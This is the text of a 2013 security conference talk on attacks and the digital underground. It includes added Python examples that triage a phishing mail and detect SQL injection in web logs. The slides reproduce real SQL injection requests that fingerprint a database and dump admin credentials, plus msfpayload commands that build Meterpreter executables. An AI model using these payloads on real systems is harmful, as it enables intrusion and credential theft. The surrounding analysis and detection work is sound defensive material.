Is it possible that, after years of indiscriminate leaks, drained bank accounts and persistent attacks of every shape and colour, nothing has changed?
Is it possible that, despite the OWASP Top 10 being cited ad nauseam and the desperate cries of the security "experts", certain habits remain so hard to kill?
Between truth and legend, we will try to understand what really matters to the poor attacker and what, unfortunately, the world of an information technology perennially dazzled by the myth of the magic box has to offer.
Attacchi, bugie e underground digitale (Attacks, Lies and the Digital Underground), by Andrea Pompili
1.
Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROMA 20-23.03.2013
www.codemotionworld.com
ATTACCHI, BUGIE E UNDERGROUND DIGITALE (Attacks, Lies and the Digital Underground)
Speaker: Andrea Pompili
There are only 10 types of people in the world: those who understand binary, and those who don't.
3.
> Remediation and hardening carried out across the board one year earlier
> Operating systems patched to the latest available version
> Full logging of all site activity
> 2 IPS (Intrusion Prevention System) in cascade
4.
Outside: 70%
Inside - Accidental: 12%
Inside - Malicious: 9%
Inside: 5%
Unknown: 4%
Source: http://datalossdb.org/ - 2012 statistics
5.
[Chart: overall attacks detected from 2007 onward, year by year]
Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
6.
[Chart: impact of the detected attacks]
Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
7.
«It is not the aim of this “focus” to report the survey results in detail, but by analysing the data on the average values for the whole sample, the results can be considered:
• satisfactory for logical protection;
• very satisfactory for infrastructure security;
• sufficient for service security;
• in need of improvement for organisational security.»
«We can say we expected it»
11.
Aki Mon Telecom
Shane Atkinson
Canter & Siegel
Eddie Davidson
Peter Francis-Macrae
Davis Wolfgang Hawke
Jumpstart Technologies
Vandar Kushnir
Kevin Lipnitz
Wayne Mansfield
Oleg Nikolaenko
Alan Ralsky
Dave Rhodes
Scott Richter
Russian Business Network
iFrame Cash
SBT Telecom Network
Defcon Host
Micronnet Ltd.
InstallsCash
Sendar Argic
Richard Colbert
RBNet
Source: Panda Security, «The Cyber-crime Black Market: Uncovered» - 2011
12.
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
14.
(*) According to Frank Rieger, Chief Technology Officer at GSMK
15.
Source: Vincenzo Iozzo – OWASP Day 2012
16.
Source: Vincenzo Iozzo – OWASP Day 2012
17.
So, how does one get full remote code execution in Chrome? In the case of Pinkie Pie’s exploit, it took a chain of six different bugs in order to successfully break out of the Chrome sandbox.
(http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html)
Last year (2011), VUPEN released a video to demonstrate a successful sandbox escape against Chrome but Google challenged the validity of that hack, claiming it exploited third-party code, believed to be the Adobe Flash plugin.
(http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser-sandbox-first-to-fall/10588)
18.
Blackhole Exploit Kit
Cool Exploit Kit
19.
http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
23.
From: hdesk@rcs.it
Sent: Thursday, November 04, 2004 7:48 PM
To: xxxxxx@rcs.it
Subject: Configuration update
Hello,
you are receiving this mail because problems have been detected with your e-mail account. The cause of these problems can be traced to an incorrect configuration of your computer, which we ask you to update by connecting to the following address:
http://xxxx.rcs.it/software/av/index.html
Please run the self-configuration script, Configurazione.vbe, whose link is available on the page indicated. At the end of the configuration a message will appear confirming that the update was successful.
Best regards
Help Desk - Technical Support RCS
RCS Editori S.p.A. - Newspapers Division
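The message above is a 2004 social-engineering mail: it comes from the company's own help-desk address, links to a host on the company's own domain and asks the recipient to run a .vbe script. The Python triage helper below is an added example, not code from the talk: it parses the headers, compares the hosts of any links with the sender domain, and flags requests to run script or executable files. The message text is a constructed English rendering of the one on the slide; the sender, recipient and URL placeholders are reproduced as shown there.

```python
import re
from email import message_from_string
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)
# File names with extensions Windows runs as code when opened.
SCRIPT_FILE_RE = re.compile(
    r"\b[\w-]+\.(?:vbe|vbs|js|jse|wsf|wsh|hta|exe|scr|bat|cmd|ps1)\b", re.I
)


def sender_domain(msg):
    """Domain part of the From header. The header is trivially forged, so it is
    evidence of nothing on its own; it is only used for the comparison below."""
    addr = msg.get("From", "")
    return addr.rsplit("@", 1)[-1].strip("<> ").lower()


def assess_message(raw):
    """Parse a raw RFC 822 message and return a small triage record."""
    msg = message_from_string(raw)
    domain = sender_domain(msg)
    body = msg.get_payload()
    hosts = [(urlparse(u).hostname or "").lower() for u in URL_RE.findall(body)]
    scripts = sorted({m.group(0) for m in SCRIPT_FILE_RE.finditer(body)})

    findings = []
    for host in hosts:
        if host == domain or host.endswith("." + domain):
            # A same-domain link looks reassuring, but From: can be spoofed and the
            # host itself may be compromised, so it is not a trust signal.
            findings.append(f"link to own-domain host {host} (spoofable)")
        else:
            findings.append(f"link to external host {host}")
    if scripts:
        findings.append("asks the user to run: " + ", ".join(scripts))

    return {
        "sender_domain": domain,
        "link_hosts": hosts,
        "scripts": scripts,
        "high_risk": bool(scripts),  # the execution request is the decisive signal
        "findings": findings,
    }


# Constructed English rendering of the 2004 message shown on the slide.
SAMPLE_MAIL = """\
From: hdesk@rcs.it
Sent: Thursday, November 04, 2004 7:48 PM
To: xxxxxx@rcs.it
Subject: Configuration update

Hello,
you are receiving this mail because problems were detected with your e-mail account.
The cause is an incorrect configuration of your computer, which we ask you to update
by visiting the following address:
http://xxxx.rcs.it/software/av/index.html
Please run the self-configuration script, Configurazione.vbe, linked from that page.
Help Desk - Technical Support RCS
"""

if __name__ == "__main__":
    for finding in assess_message(SAMPLE_MAIL)["findings"]:
        print(finding)
```

Note that the same-domain link is reported as a finding rather than a reassurance: in 2004 the link pointed at an internal host, which is exactly why the recipients trusted it, and the only robust signal in the message is the request to execute a script.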
27.
173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"
178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a,substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+"
28.
89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] "GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=11502+and(select+1+from(select+count(*),concat_ws(0x3a,substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"
Web Shell Extension
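The three requests on the two slides above are what a defender should be alerting on: an ORDER BY column-count probe, a MySQL error-based fingerprint of user()/version()/database() through the floor(rand(0)*2) duplicate-key trick, and a read of the backend user table (be_users) through the same trick. The Python detector below is an added example, not code from the talk: it parses the access-log request line, URL-decodes the target, strips the /*!...*/ MySQL version comments used to slip keywords past naive signatures, and records which indicators each request trips. The first three sample lines are the slide's requests joined onto one line each; the fourth is a constructed benign request to the same parameter.

```python
import re
from urllib.parse import unquote_plus

# Apache access-log prefix: client IP, identd, user, [timestamp], "request line".
# The target is matched lazily and the HTTP/x.y token is optional, so the third
# sample (no protocol token, user-agent immediately after) still parses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?)(?: (?P<proto>HTTP/[\d.]+))?"'
)

# Indicators drawn from the requests on the slides, each run over the
# normalised (decoded, de-commented) request target.
INDICATORS = {
    # "order by 1000": column-count probe; a three-digit index is rarely legitimate
    "order_by_probe": re.compile(r"\border\s+by\s+\d{3,}", re.I),
    # schema enumeration through information_schema
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    # floor(rand(0)*2) with group by: the MySQL duplicate-key error-based pattern
    "error_based_dup_key": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    # server fingerprinting functions
    "fingerprint_funcs": re.compile(r"\b(user|version|database)\s*\(\s*\)", re.I),
    # direct read of the backend user table seen on the second slide
    "credential_dump": re.compile(r"\bfrom\s+be_users\b", re.I),
    # trailing SQL comment that discards the rest of the original query
    "comment_terminator": re.compile(r"--\s*$"),
}


def normalize(target):
    """URL-decode the request target and strip MySQL comment wrappers."""
    decoded = unquote_plus(target)  # '+' and %XX become characters
    decoded = re.sub(r"/\*!\s*([^*]*?)\s*\*/", r"\1", decoded)  # /*!select*/ -> select
    decoded = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)  # drop ordinary comments
    return decoded


def analyze_line(line):
    """Parse one access-log line; return None if it is not one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    normalized = normalize(m.group("target"))
    hits = [name for name, rx in INDICATORS.items() if rx.search(normalized)]
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "target": normalized, "hits": hits}


def scan(lines):
    """Return a record (IP, timestamp, indicators) for every suspicious line."""
    findings = []
    for line in lines:
        rec = analyze_line(line)
        if rec and rec["hits"]:
            findings.append(rec)
    return findings


# First three lines: the requests from the slides, joined onto one line each.
# Fourth line: a constructed benign request to the same parameter.
SAMPLE_LINES = [
    '173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"',
    '178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a,substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+"',
    '89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] "GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=11502+and(select+1+from(select+count(*),concat_ws(0x3a,substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"',
    '10.0.0.5 - - [13/Nov/2012:20:05:01 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1 HTTP/1.1"',
]

if __name__ == "__main__":
    for rec in scan(SAMPLE_LINES):
        print(rec["ts"], rec["ip"], ", ".join(rec["hits"]))
```

The decode-then-strip step is the part worth copying: the second request on the slide hides every keyword inside /*!...*/ so that a signature looking for a literal "select" or "information_schema" in the raw log never fires, which is the same evasion theme the talk returns to with the IDS/IPS links on the next slide.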
29.
http://evader.stonesoft.com/
http://insecure.org/stf/secnet_ids/secnet_ids.html
31.
msfpayload windows/meterpreter/bind_tcp X > moca_x86_tcp_4444.exe
32.
msfpayload windows/x64/meterpreter/bind_tcp X > moca_x64_tcp_4444.exe
33.
“The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose”
34.
<#1> Think like an attacker, so as to understand what they will do and how they will attack you
<#2> Try to understand their objectives and the capabilities they have, but above all the operational constraints they are under
<#3> Identify the «perceived» value of what you want to defend, but above all what it is you want to defend
<#4> Work on the whole defence perimeter, without acts of faith
<#5> If your defence is cheaper than the attack, you will always be ahead
36.
Domande?
Italian
ةَّيَأ ِبلاَطَم
Arabic
¿Preguntas?
Spanish
Questions?
English
tupoQghachmey
Klingon
Sindarin
Japanese
Ερωτήσεις?
Greek
вопросы?
Russian